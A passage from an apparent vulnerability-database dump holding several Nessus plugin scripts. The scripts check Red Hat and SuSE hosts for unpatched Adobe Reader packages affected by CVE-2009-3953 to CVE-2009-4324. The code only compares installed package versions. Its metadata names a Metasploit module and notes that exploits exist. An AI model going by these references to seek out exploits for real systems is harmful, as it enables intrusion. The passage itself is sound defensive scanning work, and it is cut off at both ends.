missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues and three\nbugs are now available for Red Hat Enterprise Linux 5 Supplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nThis update also fixes the following bugs :\n\n* the acroread process continued to run even after closing a PDF file.\nIf multiple PDF files were opened and then closed, the acroread\nprocesses continued to run and consume system resources (up to 100%\nCPU usage). With this update, the acroread process correctly exits,\nwhich resolves this issue. (BZ#473217)\n\n* the PPKLite.api plug-in was missing, causing Adobe Reader to crash\nwhen attempting to open signed PDF files. For such files, if an\nimmediate crash was not observed, clicking on the Signature Panel\ncould trigger one. With this update, the PPKLite.api plug-in is\nincluded, which resolves this issue. (BZ#472975)\n\n* Adobe Reader has been upgraded to version 9.3. (BZ#497957)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues and fixes these bugs. All running instances of Adobe\nReader must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3959\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-4324\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb10-02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0037\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0037\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-9.3-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable Document Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These vulnerabilities are summarized on the Adobe Security Advisory APSB10-02 page listed in the References section. A specially crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955, CVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All users of Adobe Reader are advised to install these updated packages, which contain Adobe Reader version 9.3, which is not vulnerable to these issues. All running instances of Adobe Reader must be restarted for the update to take effect.", "modified": "2017-01-10T00:00:00", "id": "REDHAT-RHSA-2010-0038.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63912", "published": "2013-01-24T00:00:00", "title": "RHEL 4 : acroread (RHSA-2010:0038)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0038. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63912);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2017/01/10 18:05:23 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n script_bugtraq_id(37331, 37758);\n script_xref(name:\"RHSA\", value:\"2010:0038\");\n\n script_name(english:\"RHEL 4 : acroread (RHSA-2010:0038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 4 Extras.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes several vulnerabilities in Adobe Reader. These\nvulnerabilities are summarized on the Adobe Security Advisory\nAPSB10-02 page listed in the References section. A specially crafted\nPDF file could cause Adobe Reader to crash or, potentially, execute\narbitrary code as the user running Adobe Reader when opened.\n(CVE-2009-4324, CVE-2009-3953, CVE-2009-3954, CVE-2009-3955,\nCVE-2009-3959, CVE-2009-3956)\n\nAdobe have discontinued support for Adobe Reader 8 for Linux. All\nusers of Adobe Reader are advised to install these updated packages,\nwhich contain Adobe Reader version 9.3, which is not vulnerable to\nthese issues. All running instances of Adobe Reader must be restarted\nfor the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb10-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0038.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-9.3-1.el4\")) flag++;\nif (rpm_check(release:\"RHEL4\", sp:\"8\", cpu:\"i386\", reference:\"acroread-plugin-9.3-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:14:25", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code. (CVE-2009-3953 / CVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 / CVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security issues.", "modified": "2016-12-22T00:00:00", "id": "SUSE_ACROREAD-6803.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51696", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51696);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6803)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"acroread-9.3-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:14:25", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code. (CVE-2009-3953 / CVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 / CVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)", "modified": "2016-12-22T00:00:00", "id": "SUSE_ACROREAD_JA-6805.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51711", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51711);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread_ja (ZYPP Patch Number 6805)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6805.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"acroread_ja-9.3-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:14:25", "bulletinFamily": "scanner", "description": "Specially crafted PDF files could crash acroread. Attackers could exploit that to potentially execute arbitrary code. (CVE-2009-3953 / CVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 / CVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security issues.", "modified": "2016-12-22T00:00:00", "id": "SUSE_ACROREAD-6802.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51695", "published": "2011-01-27T00:00:00", "title": "SuSE 10 Security Update : acroread (ZYPP Patch Number 6802)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51695);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/22 20:32:44 $\");\n\n script_cve_id(\"CVE-2009-3953\", \"CVE-2009-3954\", \"CVE-2009-3955\", \"CVE-2009-3956\", \"CVE-2009-3957\", \"CVE-2009-3958\", \"CVE-2009-3959\", \"CVE-2009-4324\");\n\n script_name(english:\"SuSE 10 Security Update : acroread (ZYPP Patch Number 6802)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF files could crash acroread. Attackers could\nexploit that to potentially execute arbitrary code. (CVE-2009-3953 /\nCVE-2009-3954 / CVE-2009-3955 / CVE-2009-3956 / CVE-2009-3957 /\nCVE-2009-3958 / CVE-2009-3959 / CVE-2009-4324)\n\nAcrobat reader was updated to version 9.3 to fix those security\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3954.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3955.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3956.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3957.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3958.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3959.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4324.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Doc.media.newPlayer Use After Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 94, 119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not 